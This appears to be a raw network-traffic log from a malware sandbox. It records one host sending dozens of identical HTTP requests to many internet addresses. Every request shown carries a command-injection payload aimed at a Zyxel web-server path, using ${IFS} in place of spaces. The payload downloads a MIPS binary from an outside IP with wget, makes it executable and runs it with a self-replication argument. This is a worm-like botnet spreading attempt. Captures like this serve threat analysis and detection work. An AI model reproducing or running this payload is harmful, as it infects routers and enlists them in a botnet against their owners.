                                                        Feb 2, 2024 06:21:26.250950098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8350192.168.2.144555488.67.88.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.250987053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8351192.168.2.1457470130.40.165.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251039028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8352192.168.2.144289499.39.37.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251084089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8353192.168.2.1448766154.217.230.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251092911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8354192.168.2.1442758181.151.45.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251121998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8355192.168.2.1435080193.190.248.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251152039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8356192.168.2.1450680139.179.232.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251233101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8357192.168.2.143729619.131.72.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251275063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8358192.168.2.1437338196.120.249.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251298904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8359192.168.2.145786258.3.134.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251351118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8360192.168.2.143440087.9.70.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251405001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8361192.168.2.1452550199.104.77.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251422882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8362192.168.2.143413848.227.237.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251457930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8363192.168.2.143688032.166.86.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251518011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8364192.168.2.146060298.76.41.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251538992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8365192.168.2.1450304101.190.6.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251578093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8366192.168.2.1440424146.101.16.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251636028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8367192.168.2.144412282.60.92.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251672029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8368192.168.2.1435842170.156.219.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251722097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8369192.168.2.1449326196.134.201.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251760006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8370192.168.2.143665277.125.164.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251785040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8371192.168.2.144570819.148.161.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251828909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8372192.168.2.1449736159.58.85.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251876116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8373192.168.2.14375305.73.73.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251903057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8374192.168.2.145004092.135.253.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251941919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8375192.168.2.1455606107.69.51.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.251972914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8376192.168.2.1447448146.89.70.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252048969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8377192.168.2.1435030200.192.243.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252079010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8378192.168.2.14546941.126.112.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252125978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8379192.168.2.145731865.184.55.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252154112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8380192.168.2.144246442.112.12.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252197027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8381192.168.2.1453188119.254.116.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252252102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8382192.168.2.144477814.108.211.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252265930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8383192.168.2.1456402134.176.82.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252315044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8384192.168.2.1444792161.110.215.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252357960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8385192.168.2.143888423.26.220.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252403021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8386192.168.2.1456462120.50.154.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252444983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8387192.168.2.1441634147.91.1.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252481937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8388192.168.2.1438416161.200.31.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252517939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8389192.168.2.145643497.251.45.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252553940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8390192.168.2.1441790160.80.18.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252593040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8391192.168.2.145251271.231.163.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252619982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8392192.168.2.144336013.225.40.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252693892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8393192.168.2.1456450155.105.206.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252724886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8394192.168.2.1451588175.187.155.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252775908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8395192.168.2.144754035.28.147.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252825975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8396192.168.2.143989870.23.251.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252871990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8397192.168.2.1456638176.94.152.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252913952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8398192.168.2.1456870166.144.32.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252950907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8399192.168.2.1444690112.219.49.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.252996922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8400192.168.2.145777846.221.112.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253019094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8401192.168.2.1443680223.25.40.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253072977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8402192.168.2.1444980114.212.104.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253101110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8403192.168.2.1439192151.177.15.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253161907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8404192.168.2.145543279.4.142.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253187895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8405192.168.2.145223072.216.229.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253230095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8406192.168.2.143607492.120.35.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253285885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8407192.168.2.145306696.231.237.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253340960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8408192.168.2.144396484.20.129.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253369093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8409192.168.2.145366619.22.54.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253403902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8410192.168.2.1445508133.154.255.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253427982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8411192.168.2.143469087.226.111.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.253494024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8412192.168.2.143687252.50.66.226443
                                                        TimestampBytes transferredDirectionData
